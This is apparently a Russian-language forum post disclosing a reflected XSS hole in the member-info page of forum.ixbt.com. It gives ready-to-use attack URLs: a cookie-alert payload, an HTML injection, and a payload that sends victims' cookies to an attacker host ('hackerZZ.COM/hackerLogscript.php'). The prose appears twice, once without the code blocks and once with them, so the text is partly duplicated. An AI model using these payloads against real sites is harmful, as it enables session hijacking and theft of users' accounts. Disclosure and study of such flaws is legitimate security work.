Сёгодня была найдена небольшая уязвимость на forum.ixbt.com.
Заключается она в том, для просмотра "Информации об участниках" имя учатника передаётся во открытом виде и отсутствует фильтрация символов вроде: <> / и тд.
Таким образмо возможно осуществление атаки на пользователей, например:
-покажет содержание cookie
-выведет строку
и тд.
Но самое опасное в XSS- возможность вставки javascrip'ов, хотя они выполняются не на сервере, а на клиентской стороне, но через document.location.replace злоумышленник может использовать ссылку, при нажатие на которые будут получены cookie журтвы, выглядить примерно так:
-даст возможность передать значение cookie в виде параметра для скрипта hackerLogscript.php и получить cookie (записав их допустим в файл)
Подробно про XSS можно прочесть здесь:
http://www.bugtraq.ru/library/www/xssanatomy.html
http://www.bugtraq.ru/library/www/advancedxss.html
Заключается она в том, для просмотра "Информации об участниках" имя учатника передаётся во открытом виде и отсутствует фильтрация символов вроде: <> / и тд.
Таким образмо возможно осуществление атаки на пользователей, например:
Код:
http://forum.ixbt.com/users.cgi?id=info:%3Cscript%3Ealert(document.cookie)%3C/script%3E
Код:
http://forum.ixbt.com/users.cgi?id=info:%3Ch1%3Eweb-hack.ru%3C/h1%3Eи тд.
Но самое опасное в XSS- возможность вставки javascrip'ов, хотя они выполняются не на сервере, а на клиентской стороне, но через document.location.replace злоумышленник может использовать ссылку, при нажатие на которые будут получены cookie журтвы, выглядить примерно так:
Код:
http://forum.ixbt.com/users.cgi?id=info:%3Cscript%3Edocument.location.replace('http://hackerZZ.COM/hackerLogsc ript.php?targetscookie='+document.cookie);</script>Подробно про XSS можно прочесть здесь:
http://www.bugtraq.ru/library/www/xssanatomy.html
http://www.bugtraq.ru/library/www/advancedxss.html